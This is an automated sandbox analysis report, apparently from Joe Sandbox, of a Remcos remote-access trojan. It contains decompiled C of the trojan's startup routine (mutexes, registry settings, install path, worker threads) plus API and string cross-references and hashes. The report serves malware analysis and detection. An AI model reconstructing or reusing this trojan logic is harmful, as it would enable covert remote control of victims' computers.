				char _v760;
				char _v772;
				struct _SECURITY_ATTRIBUTES* _v776;
				signed int _v780;
				char _v784;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t69;
				void* _t76;
				void** _t83;
				void* _t87;
				CHAR* _t90;
				long _t92;
				int _t94;
				char _t97;
				void* _t98;
				void* _t102;
				void* _t118;
				void* _t119;
				char _t127;
				char* _t129;
				signed char* _t131;
				signed char* _t133;
				void* _t136;
				void* _t138;
				void* _t155;
				intOrPtr _t157;
				void* _t158;
				CHAR* _t174;
				intOrPtr* _t177;
				void* _t179;
				void* _t185;
				char* _t188;
				void* _t191;
				char* _t195;
				void* _t202;
				signed short* _t206;
				void* _t207;
				void* _t208;
				signed int _t209;
				void* _t215;
				CHAR* _t221;
				void* _t223;
				char* _t226;
				char* _t228;
				intOrPtr* _t230;
				void* _t232;
				intOrPtr* _t237;
				intOrPtr* _t241;
				void* _t243;
				void* _t251;
				void* _t262;
				void* _t265;
				struct _SECURITY_ATTRIBUTES* _t266;
				int _t269;
				char* _t352;
				signed int _t374;
				signed int _t378;
				int _t380;
				signed int _t386;
				signed int _t389;
				intOrPtr _t419;
				void* _t429;
				void* _t431;
				signed int _t447;
				void* _t450;
				char* _t457;
				void* _t458;
				char* _t461;
				void* _t463;
				void* _t468;
				char* _t473;
				intOrPtr* _t477;
				void* _t480;
				void* _t481;
				void* _t482;
				signed int _t488;
				void* _t491;
				void* _t492;
				void* _t493;
				void* _t495;
				void* _t501;
				void* _t502;

				_t440 = __edx;
				_push(_t265);
				L0040CFBE( &_v724, __edx, __eflags);
				_t491 = (_t488 & 0xfffffff8) - 0x2f4;
				E004020CC(_t265, _t491, __edx, __eflags, 0x46c59c);
				_t492 = _t491 - 0x18;
				E004020CC(_t265, _t492, __edx, __eflags,  &_v728);
				_t69 = E00416DD0( &_v756, __edx); // executed
				_t493 = _t492 + 0x30;
				E0040D7F8(__edx, _t69);
				L00401E54( &_v760, __edx);
				_t281 = _a12;
				if( *_a12 != 0x2d) {
					L6:
					_t457 = 0x46c578;
					__eflags =  *((char*)(L00401F75(L00401E29(0x46c578, _t440, __eflags, 3))));
					 *0x46bb05 = __eflags != 0;
					_t76 = E0040530D(_t265,  &_v756, E004075E8( &_v780, "Software\\", __eflags, L00401E29(0x46c578, _t440, __eflags, 0xe)), 0x46c578, __eflags, "\\");
					_t467 = 0x46c518;
					L00401FB1(0x46c518, _t75, 0x46c518, _t76);
					L00401FA7();
					L00401FA7();
					_t266 = 0;
					L00401E29(0x46c578, _t75, __eflags, 0x32);
					__eflags =  *(E004051EA(0));
					 *0x46bd4e = __eflags != 0;
					L00401E29(0x46c578, _t75, __eflags, 0x33);
					_t83 = E004051EA(0);
					__eflags =  *_t83;
					 *0x46bd4f =  *_t83 != 0;
					__eflags =  *0x46bd4e - _t266; // 0x0
					if(__eflags == 0) {
						L8:
						_v776 = _t266;
						_t468 = OpenMutexA(0x100000, _t266, "Remcos_Mutex_Inj");
						__eflags = _t468;
						if(_t468 != 0) {
							WaitForSingleObject(_t468, 0xea60);
							CloseHandle(_t468);
						}
						_t443 = L00401F75(0x46c518); // executed
						_t87 = E00410275(_t86, "Inj",  &_v776); // executed
						__eflags = _t87;
						if(__eflags != 0) {
							_t443 = L00401F75(0x46c518);
							E004106D2(_t256, __eflags, "Inj");
						}
						L00401F8D(0x46c548, L00401E29(_t457, _t443, __eflags, 0xe));
						_t90 = L00401F75(0x46c548);
						_t458 = 0;
						_t269 = 1;
						CreateMutexA(0, 1, _t90); // executed
						_t92 = GetLastError();
						__eflags = _t92 - 0xb7;
						if(_t92 == 0xb7) {
							L45:
							L00401FA7();
							_t94 = _t269;
							goto L5;
						} else {
							E0040D072();
							GetModuleFileNameW(0, 0x46bb08, 0x104);
							_t97 = L00416F6C(0x46c548);
							_push(0x46c548);
							_t444 = 0x80000002;
							 *0x46beb4 = _t97;
							_t98 = E004102D2( &_v772, 0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "ProductName");
							_t495 = _t493 + 0xc;
							L00401FB1(0x46c5b4, 0x80000002, 0x46c5b4, _t98);
							L00401FA7();
							__eflags =  *0x46beb4;
							if( *0x46beb4 == 0) {
								_push(" (32 bit)");
							} else {
								_push(" (64 bit)");
							}
							E004059B5(_t269, 0x46c5b4, _t458);
							_t102 =  *0x46bd24; // 0x0
							__eflags = _t102;
							if(_t102 != 0) {
								 *0x46a9d0 =  *_t102();
							}
							_t473 = 0x46c578;
							__eflags = _v776 - _t458;
							if(__eflags == 0) {
								_t429 = L00401E29(0x46c578, _t444, __eflags, 0x2e);
								__eflags =  *((char*)(L00401F75(_t429)));
								if(__eflags != 0) {
									__eflags =  *0x46bd24 - _t458; // 0x0
									if(__eflags != 0) {
										__eflags =  *0x46a9d0 - _t458; // 0x2
										if(__eflags == 0) {
											_t444 = L00401F75(0x46c518);
											_t251 = E0041022B(0x46c518, _t250, "origmsc");
											_pop(_t431);
											__eflags = _t251;
											if(__eflags == 0) {
												L00405F2A(_t269, _t431, _t444);
											}
										} else {
											_push(_t429);
											_push(_t429);
											__eflags = E0040AAB0() - 0xffffffff;
											if(__eflags == 0) {
												E00406024(__eflags);
											}
										}
									}
								}
							}
							__eflags =  *((char*)(L00401F75(L00401E29(_t473, _t444, __eflags, 0x27))));
							if(__eflags != 0) {
								E0040D797();
							}
							L00409DCB(_t269, 0x46c4e8, L00401F75(L00401E29(_t473, _t444, __eflags, 0xb)));
							__eflags =  *((char*)(L00401F75(L00401E29(_t473, _t444, __eflags, 4))));
							 *0x46bb06 = __eflags != 0;
							__eflags =  *((char*)(L00401F75(L00401E29(_t473, _t444, __eflags, 5))));
							 *0x46baff = __eflags != 0;
							__eflags =  *((char*)(L00401F75(L00401E29(_t473, _t444, __eflags, 8))));
							 *0x46bb04 = __eflags != 0;
							__eflags =  *((char*)(L00401F75(L00401E29(_t473, _t444, __eflags, 3))));
							if(__eflags != 0) {
								_t237 = L00401F75(L00401E29(_t473, _t444, __eflags, 0x30));
								_t24 = _t237 + 2; // 0x2
								_t444 = _t24;
								do {
									_t419 =  *_t237;
									_t237 = _t237 + 2;
									__eflags = _t419 - _t458;
								} while (_t419 != _t458);
								__eflags = _t237 - _t444;
								if(__eflags != 0) {
									_t241 = L00401F75(L00401E29(_t473, _t444, __eflags, 9));
									_t243 = L00401F75(L00401E29(0x46c578, _t444, __eflags, 0x30));
									_t444 =  *_t241;
									L00401EDA(0x46c530,  *_t241, _t241, E004179B3( &_v780,  *_t241, _t243));
									L00401ED0();
									_t473 = 0x46c578;
								}
							}
							__eflags = _v776 - _t458;
							if(_v776 != _t458) {
								E00431810(_t458,  &_v524, _t458, 0x208);
								_t118 = E00402469();
								_t119 = L00401F75(0x46c560);
								_t445 = L00401F75(0x46c518);
								E00410420(_t121, "exepath",  &_v524, 0x208, _t119, _t118);
								_t493 = _t495 + 0x20;
								L00409DCB(_t269, 0x46c500,  &_v524);
								_t461 = 0x46c578;
								goto L47;
							} else {
								__eflags =  *0x46bb05;
								if(__eflags == 0) {
									L00409DCB(_t269, 0x46c500, 0x46bb08);
								} else {
									_t226 = L00401F75(L00401E29(_t473, _t444, __eflags, 0x1e));
									_t228 = L00401F75(L00401E29(_t473, _t444, __eflags, 0xc));
									_t230 = L00401F75(L00401E29(0x46c578, _t444, __eflags, 9));
									__eflags =  *_t226;
									__eflags =  *_t228;
									_t473 = 0x46c578;
									_t232 = L00401F75(L00401E29(0x46c578, _t444,  *_t228, 0xa));
									L0040AD0A( *_t230, L00401F75(L00401E29(0x46c578, _t444, __eflags, 0x30)), _t232, ((_t229 & 0xffffff00 |  *_t226 != 0x00000000) & 0 | __eflags != 0x00000000) & 0x000000ff, (_t229 & 0xffffff00 |  *_t226 != 0x00000000) & 0x000000ff);
									_t495 = _t495 + 0xc;
									_t269 = 1;
									_t458 = 0;
								}
								_t202 = E00402469();
								_t447 = 2;
								_t386 =  ~(0 | __eflags > 0x00000000) | (_t202 + 0x00000001) * _t447;
								_push(_t386);
								_v780 = _t386;
								_t482 = L0042EE1E(_t386, (_t202 + 1) * _t447 >> 0x20, _t473, __eflags);
								__eflags = _t482;
								if(_t482 == 0) {
									_t482 = _t458;
								} else {
									E00431810(_t458, _t482, _t458, _v780);
									_t495 = _t495 + 0xc;
								}
								_t206 = L00401ECB(0x46c500);
								_t450 = _t482 - _t206;
								__eflags = _t450;
								_t463 = 2;
								do {
									_t389 =  *_t206 & 0x0000ffff;
									 *(_t206 + _t450) = _t389;
									_t206 = _t206 + _t463;
									__eflags = _t389;
								} while (_t389 != 0);
								_push(_t389);
								_t207 = E00402469();
								_t208 = L00401F75(0x46c560);
								_t209 = E00402469();
								E00410670(L00401F75(0x46c518), __eflags, "exepath", _t482, 2 + _t209 * 2, _t208, _t207);
								L0042EE27(_t482);
								_t461 = 0x46c578;
								_push(_t269);
								_t215 = L00401F75(L00401E29(0x46c578, _t211, __eflags, 0x34));
								_t501 = _t495 + 0x1c - 0x18;
								E00402064(_t269, _t501, _t215);
								_push("licence");
								E00410497(0x46c518, L00401F75(0x46c518));
								_t493 = _t501 + 0x20;
								L00401E29(0x46c578, _t217, __eflags, 0xd);
								_t445 = "0";
								__eflags = L0040EE79(__eflags);
								if(__eflags == 0) {
									L47:
									_t127 = E00436079(_t125, L00401F75(L00401E29(_t461, _t445, __eflags, 0x28)));
									 *0x46bb07 = _t127;
									__eflags = _t127 - 2;
									if(_t127 != 2) {
										__eflags = _t127 - _t269;
										if(__eflags == 0) {
											_t380 = 0;
											__eflags = 0;
											goto L51;
										}
									} else {
										_t380 = _t269;
										L51:
										E004188B1(_t269, _t380, _t445);
										__eflags = 0;
										CreateThread(0, 0, E00418680, 0, 0, 0);
									}
									_t129 = L00401F75(L00401E29(_t461, _t445, __eflags, 0x37));
									_t131 = L00401F75(L00401E29(_t461, _t445, __eflags, 0x10));
									_t133 = L00401F75(L00401E29(_t461, _t445, __eflags, 0xf));
									__eflags =  *_t129;
									_t467 = 0x46c578;
									_t136 = E00436079(_t134, L00401F75(L00401E29(0x46c578, _t445,  *_t129, 0x36)));
									_t138 = L00401F75(L00401E29(0x46c578, _t445, __eflags, 0x11));
									E0040846F(_t131,  *_t133 & 0x000000ff,  *_t131 & 0x000000ff, L00401F75(L00401E29(0x46c578, _t445, __eflags, 0x31)), _t138, _t136, (_t132 & 0xffffff00 | __eflags != 0x00000000) & 0x000000ff);
									__eflags =  *((intOrPtr*)(L00401F75(L00401E29(0x46c578, _t445, __eflags, 0x14)))) - 1;
									if(__eflags != 0) {
										_t457 = CreateThread;
									} else {
										_t191 = 2;
										_t481 = E0042EB70(_t445, 0x46c578, __eflags, _t191);
										 *_t481 = 0;
										_t378 = L00401E29(0x46c578, _t445, __eflags, 0x35);
										_t195 = L00401F75(_t378);
										_t457 = CreateThread;
										__eflags =  *_t195;
										 *((char*)(_t481 + 1)) = _t378 & 0xffffff00 | __eflags != 0x00000000;
										CreateThread(0, 0, E004152D7, _t481, 0, 0);
										_t467 = 0x46c578;
									}
									__eflags =  *((intOrPtr*)(L00401F75(L00401E29(_t467, _t445, __eflags, 0x16)))) - 1;
									if(__eflags == 0) {
										_t185 = 2;
										_t480 = E0042EB70(_t445, _t467, __eflags, _t185);
										 *_t480 = 1;
										_t374 = L00401E29(0x46c578, _t445, __eflags, 0x35);
										_t188 = L00401F75(_t374);
										__eflags =  *_t188;
										__eflags = 0;
										 *((char*)(_t480 + 1)) = _t374 & 0xffffff00 |  *_t188 != 0x00000000;
										CreateThread(0, 0, E004152D7, _t480, 0, 0);
										_t467 = 0x46c578;
									}
									__eflags =  *((intOrPtr*)(L00401F75(L00401E29(_t467, _t445, __eflags, 0x23)))) - 1;
									if(__eflags == 0) {
										 *0x46ba75 = 1;
										_t177 = L00401F75(L00401E29(_t467, _t445, __eflags, 0x25));
										_t179 = L00401F75(L00401E29(0x46c578, _t445, __eflags, 0x26));
										_t445 =  *_t177;
										L00401EDA(0x46c0e0,  *_t177, _t177, E00417967( &_v780,  *_t177, _t179));
										L00401ED0();
										__eflags = 0;
										CreateThread(0, 0, E00401BAD, 0, 0, 0);
										_t467 = 0x46c578;
									}
									__eflags =  *((intOrPtr*)(L00401F75(L00401E29(_t467, _t445, __eflags, 0x2b)))) - 1;
									if(__eflags == 0) {
										_t467 = L00401F75(L00401E29(_t467, _t445, __eflags, 0x2c));
										_t174 = E00436079(_t172, L00401F75(L00401E29(0x46c578, _t445, __eflags, 0x2d)));
										__eflags =  *_t467;
										_t445 = _t174;
										__eflags =  *_t467 != 0;
										E0040AA16(_t174);
									}
									L00401EDA(0x46c584, _t445, _t467, E004166F6( &_v772, _t457, __eflags));
									_t352 =  &_v776;
									L00401ED0();
									_t155 =  *0x46bd18; // 0x0
									_t266 = 0;
									__eflags = _t155;
									if(_t155 != 0) {
										 *_t155(0);
									}
									CreateThread(_t266, _t266, E0040D455, _t266, _t266, _t266);
									__eflags =  *0x46bd4e;
									if( *0x46bd4e != 0) {
										CreateThread(_t266, _t266, E0040F4B7, _t266, _t266, _t266);
									}
									__eflags =  *0x46bd4f;
									if( *0x46bd4f != 0) {
										CreateThread(_t266, _t266, E0040F9D5, _t266, _t266, _t266);
									}
									_t157 =  *0x46a9d0; // 0x2
									_t158 = _t157 - _t266;
									__eflags = _t158;
									if(__eflags == 0) {
										goto L71;
									} else {
										__eflags = _t158 - 1;
										if(__eflags == 0) {
											_push("Administrator");
											goto L72;
										}
									}
									goto L73;
								} else {
									_t221 = L00401E29(0x46c578, "0", __eflags, 0xd);
									_t502 = _t493 - 0x18;
									_t445 = _t221;
									E00416C32(_t502, _t221);
									_t223 = E0040D1AD(__eflags);
									_t493 = _t502 + 0x18;
									__eflags = _t223 - _t269;
									if(__eflags != 0) {
										goto L47;
									} else {
										_t269 = 3;
										goto L45;
									}
								}
							}
						}
					} else {
						_v780 = 0;
						_t262 = E00410275(L00401F75(0x46c518), "WD",  &_v780);
						__eflags = _t262;
						if(_t262 != 0) {
							E004106D2(L00401F75(0x46c518), __eflags, "WD");
							E0040F785();
							L71:
							_push("User");
							L72:
							E004075C4(_t266, _t493 - 0x18, "Access level: ", _t457, __eflags, E00402064(_t266,  &_v776));
							E00402064(_t266, _t493 - 4, "[Info]");
							E004165D8(_t266, _t457);
							_t352 =  &_v784;
							L00401FA7();
							L73:
							E00411319();
							asm("int3");
							_push(_t467);
							_t477 = _t352 + 0x68;
							E0040D8B5(_t266, _t477, _t477);
							_t281 = _t477;
							 *_t281 = 0x4607a0;
							 *_t281 = 0x46075c;
							return L0042FE13(_t281);
						} else {
							goto L8;
						}
					}
				} else {
					__eflags =  *((char*)(__ecx + 1)) - 0x6c;
					if(__eflags != 0) {
						goto L6;
					} else {
						__eax =  *(__ecx + 2) & 0x000000ff;
						__eflags = __al;
						if(__eflags != 0) {
							goto L6;
						} else {
							_push(__ecx);
							_push(__ecx);
							__ecx =  &_v700;
							__eax = E0040D8E4( &_v700, __edx, __eflags, "licence_code.txt", 2);
							__ecx = 0x46c578;
							__ecx = L00401E29(0x46c578, __edx, __eflags, 0x34);
							__edx = __eax;
							__ecx =  &_v720;
							__eax = E0040EC5B( &_v720, __edx, __eflags);
							__ecx =  &_v720;
							__eax = E0040D895( &_v720, __edx, __eflags);
							__ecx =  &_v720;
							L74();
							__ecx =  &_v744;
							L00401FA7() = 0;
							__eax = 1;
							__eflags = 1;
							L5:
							return _t94;
						}
					}
				}
			}

0x0040c641
0x0040c651
0x0040c654
0x0040c659
0x0040c663
0x0040c668
0x0040c672
0x0040c67b
0x0040c680
0x0040c684
0x0040c68d
0x0040c692
0x0040c698
0x0040c6ff
0x0040c6ff
0x0040c71d
0x0040c720
0x0040c742
0x0040c748
0x0040c750
0x0040c759
0x0040c762
0x0040c767
0x0040c76e
0x0040c77f
0x0040c781
0x0040c788
0x0040c78f
0x0040c794
0x0040c796
0x0040c79d
0x0040c7a3
0x0040c7cb
0x0040c7d6
0x0040c7e0
0x0040c7e2
0x0040c7e4
0x0040c7ec
0x0040c7f3
0x0040c7f3
0x0040c810
0x0040c812
0x0040c819
0x0040c81b
0x0040c825
0x0040c827
0x0040c82c
0x0040c83e
0x0040c845
0x0040c84d
0x0040c84f
0x0040c852
0x0040c858
0x0040c85e
0x0040c863
0x0040cc1b
0x0040cc1f
0x0040cc24
0x00000000
0x0040c869
0x0040c869
0x0040c879
0x0040c87f
0x0040c884
0x0040c88f
0x0040c894
0x0040c89d
0x0040c8a2
0x0040c8ad
0x0040c8b6
0x0040c8bb
0x0040c8c4
0x0040c8cd
0x0040c8c6
0x0040c8c6
0x0040c8c6
0x0040c8d2
0x0040c8d7
0x0040c8dc
0x0040c8de
0x0040c8e2
0x0040c8e2
0x0040c8e7
0x0040c8ec
0x0040c8f0
0x0040c8fb
0x0040c902
0x0040c905
0x0040c907
0x0040c90d
0x0040c90f
0x0040c915
0x0040c939
0x0040c93b
0x0040c940
0x0040c941
0x0040c943
0x0040c945
0x0040c945
0x0040c917
0x0040c917
0x0040c918
0x0040c91e
0x0040c921
0x0040c923
0x0040c923
0x0040c921
0x0040c915
0x0040c90d
0x0040c905
0x0040c95a
0x0040c95d
0x0040c95f
0x0040c95f
0x0040c97a
0x0040c993
0x0040c996
0x0040c9ad
0x0040c9b0
0x0040c9c7
0x0040c9ca
0x0040c9dd
0x0040c9e0
0x0040c9ed
0x0040c9f2
0x0040c9f2
0x0040c9f5
0x0040c9f5
0x0040c9f8
0x0040c9fb
0x0040c9fb
0x0040ca00
0x0040ca04
0x0040ca11
0x0040ca26
0x0040ca2b
0x0040ca3e
0x0040ca47
0x0040ca4c
0x0040ca4c
0x0040ca04
0x0040ca51
0x0040ca55
0x0040cc3a
0x0040cc49
0x0040cc51
0x0040cc6f
0x0040cc71
0x0040cc76
0x0040cc86
0x0040cc8b
0x00000000
0x0040ca5b
0x0040ca5b
0x0040ca62
0x0040caf8
0x0040ca68
0x0040ca73
0x0040ca85
0x0040ca9a
0x0040ca9f
0x0040caa7
0x0040caad
0x0040cac5
0x0040cadf
0x0040cae6
0x0040cae9
0x0040caea
0x0040caea
0x0040cb02
0x0040cb0c
0x0040cb14
0x0040cb16
0x0040cb17
0x0040cb20
0x0040cb23
0x0040cb25
0x0040cb37
0x0040cb27
0x0040cb2d
0x0040cb32
0x0040cb32
0x0040cb3e
0x0040cb47
0x0040cb47
0x0040cb49
0x0040cb4a
0x0040cb4a
0x0040cb4d
0x0040cb51
0x0040cb53
0x0040cb53
0x0040cb58
0x0040cb60
0x0040cb68
0x0040cb73
0x0040cb92
0x0040cb98
0x0040cba0
0x0040cba7
0x0040cbb1
0x0040cbb6
0x0040cbbc
0x0040cbc1
0x0040cbd2
0x0040cbd7
0x0040cbde
0x0040cbe3
0x0040cbef
0x0040cbf1
0x0040cc90
0x0040cca1
0x0040ccac
0x0040ccb2
0x0040ccb4
0x0040ccba
0x0040ccbc
0x0040ccbe
0x0040ccbe
0x00000000
0x0040ccbe
0x0040ccb6
0x0040ccb6
0x0040ccc0
0x0040ccc0
0x0040ccc5
0x0040ccd1
0x0040ccd1
0x0040ccde
0x0040ccf0
0x0040cd02
0x0040cd07
0x0040cd0c
0x0040cd29
0x0040cd3b
0x0040cd5a
0x0040cd72
0x0040cd74
0x0040cdbd
0x0040cd76
0x0040cd78
0x0040cd7f
0x0040cd8b
0x0040cd92
0x0040cd94
0x0040cd99
0x0040cd9f
0x0040cdb1
0x0040cdb4
0x0040cdb6
0x0040cdb6
0x0040cdd3
0x0040cdd5
0x0040cdd9
0x0040cde0
0x0040cdea
0x0040cdf1
0x0040cdf3
0x0040cdf8
0x0040cdfe
0x0040ce0a
0x0040ce0d
0x0040ce0f
0x0040ce0f
0x0040ce24
0x0040ce26
0x0040ce2c
0x0040ce39
0x0040ce4e
0x0040ce53
0x0040ce66
0x0040ce6f
0x0040ce74
0x0040ce80
0x0040ce82
0x0040ce82
0x0040ce97
0x0040ce99
0x0040ceb2
0x0040cec1
0x0040cec6
0x0040cec9
0x0040cecc
0x0040cecf
0x0040cecf
0x0040cee3
0x0040cee8
0x0040ceec
0x0040cef1
0x0040cef6
0x0040cef8
0x0040cefa
0x0040cefd
0x0040cefd
0x0040cf09
0x0040cf0b
0x0040cf12
0x0040cf1e
0x0040cf1e
0x0040cf20
0x0040cf27
0x0040cf33
0x0040cf33
0x0040cf35
0x0040cf3a
0x0040cf3a
0x0040cf3c
0x00000000
0x0040cf3e
0x0040cf3e
0x0040cf41
0x0040cf43
0x00000000
0x0040cf43
0x0040cf41
0x00000000
0x0040cbf7
0x0040cbfb
0x0040cc00
0x0040cc03
0x0040cc07
0x0040cc0c
0x0040cc11
0x0040cc14
0x0040cc16
0x00000000
0x0040cc18
0x0040cc1a
0x00000000
0x0040cc1a
0x0040cc16
0x0040cbf1
0x0040ca55
0x0040c7a5
0x0040c7a9
0x0040c7bc
0x0040c7c3
0x0040c7c5
0x0040cf58
0x0040cf62
0x0040cf67
0x0040cf67
0x0040cf6c
0x0040cf80
0x0040cf8f
0x0040cf94
0x0040cf9c
0x0040cfa0
0x0040cfa5
0x0040cfa5
0x0040cfaa
0x0040cfab
0x0040cfac
0x0040cfb1
0x0040cfb6
0x0040e3d2
0x0040c4fa
0x0040c506
0x00000000
0x00000000
0x00000000
0x0040c7c5
0x0040c69a
0x0040c69a
0x0040c69e
0x00000000
0x0040c6a0
0x0040c6a0
0x0040c6a4
0x0040c6a6
0x00000000
0x0040c6a8
0x0040c6a8
0x0040c6a9
0x0040c6b1
0x0040c6b5
0x0040c6bc
0x0040c6c6
0x0040c6cd
0x0040c6cf
0x0040c6d3
0x0040c6d8
0x0040c6dc
0x0040c6e1
0x0040c6e5
0x0040c6ea
0x0040c6f3
0x0040c6f5
0x0040c6f5
0x0040c6f6
0x0040c6fc
0x0040c6fc
0x0040c6a6
0x0040c69e

APIs

OpenMutexA.KERNEL32 ref: 0040C7DA
WaitForSingleObject.KERNEL32(00000000,0000EA60), ref: 0040C7EC
CloseHandle.KERNEL32(00000000), ref: 0040C7F3
CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,0000000E), ref: 0040C852
GetLastError.KERNEL32 ref: 0040C858
GetModuleFileNameW.KERNEL32(00000000,0046BB08,00000104), ref: 0040C879

Part of subcall function 0040EC5B: __EH_prolog.LIBCMT ref: 0040EC60

Strings

(32 bit), xrefs: 0040C8CD
(64 bit), xrefs: 0040C8C6
User, xrefs: 0040CF67
Access level: , xrefs: 0040CF78
Remcos_Mutex_Inj, xrefs: 0040C7CB
[Info], xrefs: 0040CF8A
origmsc, xrefs: 0040C92A
ProductName, xrefs: 0040C885
Software\, xrefs: 0040C72D
Administrator, xrefs: 0040CF43
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0040C88A
licence_code.txt, xrefs: 0040C6AC
exepath, xrefs: 0040CB86, 0040CC65
licence, xrefs: 0040CBC1
Inj, xrefs: 0040C7FD, 0040C808, 0040C81D

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: Mutex$CloseCreateErrorFileH_prologHandleLastModuleNameObjectOpenSingleWait
String ID: (32 bit)$ (64 bit)$Access level: $Administrator$Inj$ProductName$Remcos_Mutex_Inj$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Software\$User$[Info]$exepath$licence$licence_code.txt$origmsc
API String ID: 1247502528-1622708067
Opcode ID: 7cdd82cf4a45d0392b82b258da9d8b2adb6adc807e5bfc7386476d05e799ce2c
Instruction ID: 42bfda91432e7fc4dea79f371f9b9f268822a4ed28c20108b284d7b9b352ec02
Opcode Fuzzy Hash: 7cdd82cf4a45d0392b82b258da9d8b2adb6adc807e5bfc7386476d05e799ce2c
Instruction Fuzzy Hash: 6132F460B443516BDA15B7729CA7B3E25898B81748F04053FF542BB2E3EEBC9D41839E

Uniqueness

Uniqueness Score: -1.00%

Function 00410275, Relevance: 4.5, APIs: 3, Instructions: 37
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00410275(char* __edx, char* _a4, char* _a8) {
				void* _v8;
				int _v12;
				int _v16;
				int _t12;
				long _t14;
				long _t18;
				signed int _t19;

				_t12 = 4;
				_v12 = _t12;
				_v16 = _t12;
				_t14 = RegOpenKeyExA(0x80000001, __edx, 0, 0x20019,  &_v8); // executed
				if(_t14 != 0) {
					return 0;
				}
				_t18 = RegQueryValueExA(_v8, _a4, 0,  &_v16, _a8,  &_v12); // executed
				_t19 = RegCloseKey(_v8); // executed
				return _t19 & 0xffffff00 | _t18 == 0x00000000;
			}

0x0041027d
0x0041027e
0x00410281
0x00410295
0x0041029d
0x00000000
0x004102cc
0x004102b3
0x004102be
0x00000000

APIs

RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00410295
RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,?,00000000), ref: 004102B3
RegCloseKey.KERNELBASE(?), ref: 004102BE

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 6020211f2f41a99924b2582c1e80447f15e98d83b67fb738d9560e140564669e
Instruction ID: da35563d8025d65dfadb3f1a4e24c633330656b2ed15e4664ff05724ceb20d8f
Opcode Fuzzy Hash: 6020211f2f41a99924b2582c1e80447f15e98d83b67fb738d9560e140564669e
Instruction Fuzzy Hash: 90F01D7690030CBFDF109FA09D05BEE7BBCEB04B51F1040A5FE04E6195D2719B549B94

Uniqueness

Uniqueness Score: -1.00%

Function 00401626, Relevance: 3.0, APIs: 2, Instructions: 36
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E00401626(signed int _a4, signed int _a8, char _a12) {
				intOrPtr _v16;
				char _v20;
				intOrPtr _v32;
				char _v36;
				char _v52;
				void* __esi;
				signed int _t21;
				signed int _t22;
				signed int _t24;
				intOrPtr _t40;
				signed int _t42;
				signed int _t43;
				signed int _t45;
				char* _t48;
				signed int _t53;
				char* _t55;
				void* _t57;
				char _t58;
				void* _t61;
				void* _t63;
				void* _t64;
				void* _t67;
				void* _t68;

				_t61 = _t67;
				_t42 = _a4;
				if(_t42 != 0) {
					_t22 = _t21 | 0xffffffff;
					_t53 = _t22 % _a8;
					__eflags = _t22 / _a8 - _t42;
					if(_t22 / _a8 >= _t42) {
						_t43 = _t42 * _a8;
						__eflags = _a12;
						if(__eflags == 0) {
							L8:
							_t24 = E0042EB70(_t53, _t57, __eflags, _t43); // executed
							_t45 = _t24;
							goto L9;
						} else {
							__eflags = _t43 - 0x1000;
							if(__eflags < 0) {
								goto L8;
							} else {
								_t26 = _t43 + 0x23;
								__eflags = _t43 + 0x23 - _t43;
								if(__eflags <= 0) {
									goto L3;
								} else {
									_t40 = E0042EB70(_t53, _t57, __eflags, _t26);
									_t11 = _t40 + 0x23; // 0x23
									_t45 = _t11 & 0xffffffe0;
									 *((intOrPtr*)(_t45 - 4)) = _t40;
									L9:
									return _t45;
								}
							}
						}
					} else {
						L3:
						_push(_t61);
						_t63 = _t67;
						_t68 = _t67 - 0xc;
						E0042F243( &_v20);
						E0043196A( &_v20, 0x467c8c);
						asm("int3");
						_push(_t63);
						_t64 = _t68;
						E0042F846( &_v36, _v16);
						E0043196A( &_v36, 0x467d1c);
						asm("int3");
						_push(_t64);
						_t48 =  &_v52;
						E0042F89D(_t48, _v32);
						E0043196A( &_v52, 0x467d58);
						asm("int3");
						_t55 = _t48;
						__eflags = 1;
						asm("lock xadd [0x46a024], eax");
						if(1 == 0) {
							_push(_t57);
							_t58 = 0x46b050;
							do {
								E004301F5(_t58);
								_t58 = _t58 + 0x18;
								__eflags = _t58 - 0x46b110;
							} while (_t58 < 0x46b110);
						}
						return _t55;
					}
				} else {
					return 0;
				}
			}

0x00401627
0x00401629
0x0040162e
0x00401634
0x00401639
0x0040163c
0x0040163e
0x00401645
0x00401649
0x0040164d
0x00401670
0x00401671
0x00401677
0x00000000
0x0040164f
0x0040164f
0x00401655
0x00000000
0x00401657
0x00401657
0x0040165a
0x0040165c
0x00000000
0x0040165e
0x0040165f
0x00401665
0x00401668
0x0040166b
0x00401679
0x0040167c
0x0040167c
0x0040165c
0x00401655
0x00401640
0x00401640
0x0042f8eb
0x0042f8ec
0x0042f8ee
0x0042f8f4
0x0042f902
0x0042f907
0x0042f908
0x0042f909
0x0042f914
0x0042f922
0x0042f927
0x0042f928
0x0042f92e
0x0042f934
0x0042f942
0x0042f947
0x0042f94b
0x0042f94d
0x0042f94e
0x0042f956
0x0042f958
0x0042f959
0x0042f95e
0x0042f95f
0x0042f964
0x0042f968
0x0042f968
0x0042f970
0x0042f974
0x0042f974
0x00401630
0x00401633
0x00401633

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89cebbe0198638ea8ec5d5e87b0717fa0c6332f7e957d641d40c1ab821c69aa3
